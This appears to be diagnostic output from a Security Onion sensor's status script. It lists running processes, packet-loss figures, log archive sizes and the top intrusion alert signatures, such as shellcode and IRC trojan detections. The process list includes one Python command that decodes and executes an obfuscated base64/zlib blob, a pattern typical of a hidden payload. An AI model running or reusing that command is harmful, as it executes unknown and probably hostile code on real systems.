0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.3 /usr/bin/python /usr/bin/salt-master
0.0 0.1 /usr/bin/python /usr/bin/salt-master
0.0 0.0 /var/ossec/bin/ossec-monitord
0.0 0.0 /bin/sh -c sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-syslog-ng.sh
0.0 0.0 sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-syslog-ng.sh
0.0 0.0 [kworker/2:1H]
0.0 0.0 /usr/sbin/cupsd -f
0.0 0.0 /usr/bin/ssh-agent -s
0.0 0.0 /usr/lib/upower/upowerd
0.0 0.0 /usr/lib/udisks2/udisksd --no-debug
0.0 0.0 init --user --startup-event indicator-services-start
0.0 0.0 /usr/sbin/ntpd -p /var/run/ntpd.pid -g -u 117:126
0.0 1.4 /usr/sbin/apache2 -k start
0.0 0.0 /sbin/getty -8 38400 tty1
0.0 0.0 [kworker/1:1H]
0.0 0.0 su - SO-user -- /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.0 0.0 tclsh /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.0 0.0 tclsh /usr/bin/SO-userd -c /etc/nsm/securitySO-server/SO-userd.conf -a /etc/nsm/securitySO-server/autocat.conf -g /etc/nsm/securitySO-server/SO-userd.queries -A /etc/nsm/securitySO-server/SO-userd.access -C /etc/nsm/securitySO-server/certs
0.0 0.0 su - SO-user -- /usr/bin/ossec_agent.tcl -o -f /var/ossec/logs/alerts/alerts.log -i X.X.X.X -p 5 -c /etc/nsm/ossec/ossec_agent.conf
0.0 0.1 tclsh /usr/bin/ossec_agent.tcl -o -f /var/ossec/logs/alerts/alerts.log -i X.X.X.X -p 5 -c /etc/nsm/ossec/ossec_agent.conf
0.0 0.0 tail -n 0 -F /var/ossec/logs/alerts/alerts.log
0.0 0.0 su - SO-user -- /usr/bin/pcap_agent.tcl -c /etc/nsm/SO-server-eth1/pcap_agent.conf
0.0 0.0 tclsh /usr/bin/pcap_agent.tcl -c /etc/nsm/SO-server-eth1/pcap_agent.conf
0.0 0.0 su - SO-user -- /usr/bin/snort_agent.tcl -c /etc/nsm/SO-server-eth1/snort_agent-1.conf
0.0 0.0 tail -n 1 -f /nsm/sensor_data/SO-server-eth1/snort-1.stats
0.0 0.0 [kworker/0:0]
0.0 0.0 sshd: SO-user [priv]
0.0 0.0 sshd: SO-user@pts/4
0.0 0.0 -bash
0.0 0.0 /bin/bash /opt/bro/share/broctl/scripts/run-bro -1 -U .status -p broctl -p broctl-live -p local -p manager local.bro broctl base/frameworks/cluster local-manager.bro broctl/auto
0.0 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p manager local.bro broctl base/frameworks/cluster local-manager.bro broctl/auto
0.0 0.0 /bin/bash /opt/bro/share/broctl/scripts/run-bro -1 -U .status -p broctl -p broctl-live -p local -p proxy local.bro broctl base/frameworks/cluster local-proxy broctl/auto
0.0 0.4 /opt/bro/bin/bro -U .status -p broctl -p broctl-live -p local -p proxy local.bro broctl base/frameworks/cluster local-proxy broctl/auto
0.0 0.0 /bin/bash /opt/bro/share/broctl/scripts/run-bro -1 -i eth1 -U .status -p broctl -p broctl-live -p local -p SO-server-eth1-1 local.bro broctl base/frameworks/cluster local-worker.bro broctl/auto
0.0 0.0 lightdm --session-child 12 21
0.0 0.0 /usr/bin/gnome-keyring-daemon --daemonize --login
0.0 0.0 init --user
0.0 0.0 dbus-daemon --fork --session --address=unix:abstract=/tmp/dbus-yHYdmVL9u1
0.0 0.0 upstart-event-bridge
0.0 0.0 upstart-file-bridge --daemon --user
0.0 0.0 upstart-dbus-bridge --daemon --session --user --bus-name session
0.0 0.0 upstart-dbus-bridge --daemon --system --user --bus-name system
0.0 0.0 /usr/lib/at-spi2-core/at-spi-bus-launcher
0.0 0.0 /bin/dbus-daemon --config-file=/etc/at-spi2/accessibility.conf --nofork --print-address 3
0.0 0.0 /usr/lib/at-spi2-core/at-spi2-registryd --use-gnome-session
0.0 0.0 /usr/lib/gvfs/gvfsd
0.0 0.0 /usr/lib/gvfs/gvfsd-fuse /run/user/1000/gvfs -f -o big_writes
0.0 0.0 /bin/sh /etc/xdg/xfce4/xinitrc -- /etc/X11/xinit/xserverrc
0.0 0.0 xfce4-session
0.0 0.0 /usr/lib/x86_64-linux-gnu/xfce4/xfconf/xfconfd
0.0 0.0 /usr/bin/ssh-agent -s
0.0 0.1 xfwm4
0.0 0.1 xfce4-panel
0.0 0.3 Thunar --daemon
0.0 0.0 /usr/lib/x86_64-linux-gnu/indicator-power/indicator-power-service
0.0 0.0 light-locker
0.0 0.0 xfce4-power-manager
0.0 0.0 /usr/lib/x86_64-linux-gnu/indicator-application/indicator-application-service
0.0 0.0 /usr/lib/policykit-1-gnome/polkit-gnome-authentication-agent-1
0.0 0.1 update-notifier
0.0 0.2 /usr/bin/python /usr/bin/blueman-applet
0.0 0.1 nm-applet
0.0 0.2 /usr/bin/python /usr/share/system-config-printer/applet.py
0.0 0.0 xfce4-volumed
0.0 0.1 xfsettingsd
0.0 0.0 /usr/bin/pulseaudio --start --log-target=syslog
0.0 0.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-1.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libsystray.so 4 16777249 systray Notification Area Area where notification icons appear
0.0 0.1 /usr/lib/x86_64-linux-gnu/xfce4/panel/wrapper-2.0 /usr/lib/x86_64-linux-gnu/xfce4/panel/plugins/libindicator-plugin.so 5 16777250 indicator Indicator Plugin Provides a panel area for Unity indicators. Indicators allow applications and system services to display their status and interact with the user.
0.0 0.0 init --user --startup-event indicator-services-start
0.0 0.0 /usr/lib/x86_64-linux-gnu/gconf/gconfd-2
0.0 0.0 /usr/lib/gvfs/gvfs-udisks2-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfs-mtp-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfs-gphoto2-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfs-afc-volume-monitor
0.0 0.0 /usr/lib/gvfs/gvfsd-trash --spawner :1.8 /org/gtk/gvfs/exec_spaw/0
0.0 0.0 /usr/bin/obex-data-server --no-daemon
0.0 0.2 chromium-browser --type=zygote
0.0 0.1 chromium-browser --type=zygote
0.0 0.0 [kworker/3:0]
0.0 0.0 [kworker/1:4]
0.0 0.1 /usr/lib/x86_64-linux-gnu/tumbler-1/tumblerd
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 1.3 /usr/sbin/apache2 -k start
0.0 0.0 sudo sostat-redacted
0.0 0.0 /bin/bash /usr/bin/sostat-redacted
0.0 0.0 /bin/bash /usr/bin/sostat
0.0 0.0 sed -r s/(\b[0-9]{1,3}\.){3}[0-9]{1,3}\b/X.X.X.X/g
0.0 0.0 sed -r s/([0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2}/MM:MM:MM:MM:MM:MM/g
0.0 0.0 sed -r s/(([0-9a-fA-F]{1,4}:){7,7}[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,7}:|([0-9a-fA-F]{1,4}:){1,6}:[0-9a-fA-F]{1,4}|([0-9a-fA-F]{1,4}:){1,5}(:[0-9a-fA-F]{1,4}){1,2}|([0-9a-fA-F]{1,4}:){1,4}(:[0-9a-fA-F]{1,4}){1,3}|([0-9a-fA-F]{1,4}:){1,3}(:[0-9a-fA-F]{1,4}){1,4}|([0-9a-fA-F]{1,4}:){1,2}(:[0-9a-fA-F]{1,4}){1,5}|[0-9a-fA-F]{1,4}:((:[0-9a-fA-F]{1,4}){1,6})|:((:[0-9a-fA-F]{1,4}){1,7}|:)|fe80:(:[0-9a-fA-F]{0,4}){0,4}%[0-9a-zA-Z]{1,}|::(ffff(:0{1,4}){0,1}:){0,1}((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9])|([0-9a-fA-F]{1,4}:){1,4}:((25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]).){3,3}(25[0-5]|(2[0-4]|1{0,1}[0-9]){0,1}[0-9]))\b/X.X.X.X/g
0.0 0.0 sed -r s/X:ssh_port/X:ssh_port/g
0.0 0.0 sed -r s/\*:ssh_port/*:ssh_port/g
0.0 0.0 sed -r s/SO-server/SO-server/g
0.0 0.0 sed -r s/SO-node/SO-node/g
0.0 0.0 sed -r s/SO-user|SO-user/SO-user/g
0.0 0.0 [kworker/0:1]
0.0 0.0 CRON
0.0 0.0 CRON
0.0 0.0 /bin/sh -c sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-cron.sh > /dev/null 2>&1
0.0 0.0 sh /opt/elsa/contrib/securitySO-server/contrib/securitySO-server-elsa-cron.sh
0.0 0.0 /bin/sh -c /usr/sbin/so-bro-cron >> /var/log/nsm/so-bro-cron.log 2>&1
0.0 0.0 /bin/bash /usr/sbin/so-bro-cron
0.0 0.0 su SO-user -c /opt/bro/bin/broctl cron
0.0 0.0 sh
0.0 0.0 /usr/bin/python -c import zlib,base64; exec(zlib.decompress(base64.b64decode(b"eJxlU01v2zAMPUe/QvClEqYZTbCTAR1z6GFYD93JMwLXplsVtmRI9pyg6H8fKcVrmhz8IfLxkXwimRlG5yfuggonfObn0bsGAv6aF1v3KkAPzaTegrPs6eHn/tfvJ73d3TPWQscXEWTBNhiZh6l185Qv3kwgPIweXfwbz/7YTH5BdP0cXoVMBHCE5tAMbRD0Iq5RlxXbdM5zo9DGjeVg5wF8jbwraDP5E302VKz+LDp/dCNYgqmU7Yvv4XFPZvD+2sxlJMvrEcNbIYwiryQrHBsYJ76PH+MsrwOHmHshnNiquztk9QKkpAAP0+wtHxlbROahbk/Yf+OGobZtoN6Srnnd134QZ0Ulo4Z7Y4H6RQVRvaSYsTmRkEtlrbNAemL6lXEtme4n712NShIWK2HUQtAXCp9DsJyhPQz1qN8/WHfxF3SASaRakgJUTaTBjE6/Z6Y9ZoVRPCNjVtAbD0nqrCirdECBz4elNpOxL1mx+8A7jalKCjrPQqVduUZXNwCkWQHEiIBz3VcUt/YUSYQhn8eWJkdcxKgLHAm1vJoeOIKxS68O6qDT0OfpI9CjsJ2ykmkwuziVnoYA2UacMhfiLSEy75DLOiHV9n73gwbIdDyh4tCce+zaar255IwD2DiLcs3A8IA96bUvRLNN7MbD4P4C5pEJUv6XuPqutynbV3NxTRxXJmLiJRJzmOppDjrKQoFCptb0c5blb87Ejfq8qbgWuEQ33nhN5MXViDaal0qJxK9I+ii5jMtB04y78Q9tonhI")))
0.0 0.0 ps -eo pcpu,pmem,args --sort -pcpu
=========================================================================
Packets received during last monitoring interval (600 seconds)
=========================================================================
eth1: 4979407
=========================================================================
Packet Loss Stats
=========================================================================
NIC:
eth1:
RX packets:56353787 dropped:0 TX packets:0 dropped:0
-------------------------------------------------------------------------
pf_ring:
Appl. Name : bro-eth1
Tot Packets : 34675530
Tot Pkt Lost : 62159
Appl. Name : snort-cluster-52-socket-0
Tot Packets : 34525973
Tot Pkt Lost : 21603700
-------------------------------------------------------------------------
IDS Engine (snort) packet drops:
/nsm/sensor_data/SO-server-eth1/snort-1.stats last reported pkt_drop_percent as 59.982
-------------------------------------------------------------------------
-------------------------------------------------------------------------
Netsniff-NG:
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +281087 Lost: -84828
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153675 Lost: -52729
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154609 Lost: -29468
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +141898 Lost: -67497
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +149275 Lost: -50137
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152901 Lost: -87428
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +163313 Lost: -52650
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152639 Lost: -8930
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157847 Lost: -77388
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151968 Lost: -55856
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +204140 Lost: -57843
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152290 Lost: -58986
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +171016 Lost: -115309
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153623 Lost: -44488
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +166983 Lost: -127872
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150231 Lost: -101962
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155714 Lost: -97126
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +144220 Lost: -78622
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158514 Lost: -23123
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156996 Lost: -130088
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157654 Lost: -67854
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157060 Lost: -88992
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151666 Lost: -152145
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154369 Lost: -219589
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150539 Lost: -67751
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +162345 Lost: -105355
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154327 Lost: -167312
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155661 Lost: -75838
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +163706 Lost: -50332
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158259 Lost: -32470
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156628 Lost: -89305
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +159619 Lost: -89893
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154935 Lost: -32824
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +161616 Lost: -150161
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150788 Lost: -80130
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153007 Lost: -191410
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156020 Lost: -153183
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154653 Lost: -21881
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +168716 Lost: -88843
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155129 Lost: -155794
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154156 Lost: -21525
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +170767 Lost: -282004
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152312 Lost: -156235
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151800 Lost: -323131
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156651 Lost: -69671
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +159133 Lost: -111679
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153811 Lost: -157958
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152442 Lost: -68448
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154479 Lost: -367559
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153201 Lost: -146661
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154612 Lost: -284389
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151621 Lost: -98944
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156913 Lost: -401066
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +160220 Lost: -196947
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150948 Lost: -194220
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158654 Lost: -170584
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154511 Lost: -4798
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +171438 Lost: -49109
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152965 Lost: -94511
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154415 Lost: -158397
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150472 Lost: -87014
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +181953 Lost: -319597
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155490 Lost: -54181
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154236 Lost: -214645
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154378 Lost: -190112
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154606 Lost: -147184
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154932 Lost: -56900
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +149442 Lost: -56543
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156239 Lost: -207813
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +162749 Lost: -120312
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153262 Lost: -43779
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152895 Lost: -124177
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157192 Lost: -78728
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155885 Lost: -99228
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154574 Lost: -97527
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +149461 Lost: -40833
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158258 Lost: -67950
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151817 Lost: -53498
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151833 Lost: -65108
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150379 Lost: -56513
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +163113 Lost: -128011
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +164900 Lost: -52247
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155976 Lost: -240717
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155348 Lost: -146285
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155486 Lost: -183885
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154410 Lost: -112444
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152535 Lost: -137474
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153837 Lost: -8714
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158562 Lost: -91344
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155802 Lost: -138584
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153267 Lost: -169563
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150112 Lost: -120893
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +165912 Lost: -190196
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158494 Lost: -14316
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +162094 Lost: -82767
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153381 Lost: -253637
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158809 Lost: -140933
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +158387 Lost: -103296
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +165453 Lost: -218529
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150309 Lost: -249883
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +153836 Lost: -26062
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157252 Lost: -171448
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155483 Lost: -270732
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154217 Lost: -197405
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154570 Lost: -303347
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152260 Lost: -182846
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +154920 Lost: -153915
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +155554 Lost: -176945
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157189 Lost: -124202
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +159435 Lost: -196643
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156949 Lost: -26469
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +160441 Lost: -116791
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +156311 Lost: -41854
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +166929 Lost: -215139
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157383 Lost: -239468
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152067 Lost: -30521
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +151948 Lost: -47211
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157341 Lost: -238247
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +157204 Lost: -146132
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +150749 Lost: -157308
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log Processed: +152474 Lost: -204891
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814035214 Processed: +225581 Lost: -29388
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814035214 Processed: +154392 Lost: -12750
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +244863 Lost: -18107
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +156780 Lost: -49606
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +152666 Lost: -115945
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +165067 Lost: -10979
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +203398 Lost: -82552
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +145210 Lost: -31184
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +160493 Lost: -150432
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +171957 Lost: -208898
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154579 Lost: -37074
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +200343 Lost: -15445
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +161059 Lost: -170284
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +116291 Lost: -55688
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +144739 Lost: -29414
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +119307 Lost: -8220
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +217198 Lost: -266748
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +119169 Lost: -1233
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +186692 Lost: -36804
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +159937 Lost: -166349
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154573 Lost: -12746
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +146880 Lost: -170568
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +156046 Lost: -99220
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +131688 Lost: -30925
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +149258 Lost: -41035
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +170429 Lost: -95190
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +148444 Lost: -69031
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154177 Lost: -7813
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +184301 Lost: -72774
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +163189 Lost: -116529
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +157240 Lost: -168891
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +155869 Lost: -70119
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +152651 Lost: -38884
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +147671 Lost: -68387
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +159191 Lost: -279033
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154387 Lost: -156815
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +148401 Lost: -34349
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +156319 Lost: -42639
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +151356 Lost: -135694
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154847 Lost: -171976
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +152676 Lost: -34167
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +154880 Lost: -6362
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +160433 Lost: -144546
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +161637 Lost: -213360
File: /var/log/nsm/SO-server-eth1/netsniff-ng.log.20160814173716 Processed: +158114 Lost: -18337
=========================================================================
PF_RING
=========================================================================
PF_RING Version : 6.4.1 (unknown)
Total rings : 2
Standard (non ZC) Options
Ring slots : 4096
Slot version : 16
Capture TX : Yes [RX+TX]
IP Defragment : No
Socket Mode : Standard
Total plugins : 0
Cluster Fragment Queue : 0
Cluster Fragment Discard : 0
=========================================================================
Log Archive
=========================================================================
/nsm/sensor_data/SO-server-eth0/dailylogs/ - 0 days
4.0K .
/nsm/sensor_data/SO-server-eth1/dailylogs/ - 1 days
30G .
30G ./2016-08-14
/nsm/bro/logs/ - 1 days
516K .
260K ./2016-08-14
252K ./stats
=========================================================================
Sguil Uncategorized Events
=========================================================================
COUNT(*)
432801
=========================================================================
Sguil events summary for yesterday
=========================================================================
Total
0
=========================================================================
Top 50 All time Sguil Events
=========================================================================
Totals GenID:SigID Signature
340570 1:2012088 ET SHELLCODE Possible Call with No Offset TCP Shellcode
317031 1:2100651 GPL SHELLCODE x86 stealth NOOP
61 1:2000419 ET POLICY PE EXE or DLL Windows file download
41 1:2014939 ET POLICY DNS Query for TOR Hidden Domain .SO-server Accessible Via TOR
4 1:2021874 ET TROJAN Linux/dtool IRC Command (UDPFLOOD)
4 1:2021873 ET TROJAN Linux/dtool IRC Command (TCPFLOOD)
4 1:2021872 ET TROJAN Linux/dtool IRC Command (HTTPFLOOD)
3 1:2000418 ET POLICY Executable and linking format (ELF) file download
2 1:2021915 ET TROJAN ELF/muBoT IRC Activity 4
2 1:2013028 ET POLICY curl User-Agent Outbound
2 1:2021879 ET TROJAN Linux/dtool IRC Command (STOP)
Total
657725
=========================================================================
Last update
=========================================================================
Start-Date: 2016-08-01 16:35:24
Commandline: apt-get -y dist-upgrade
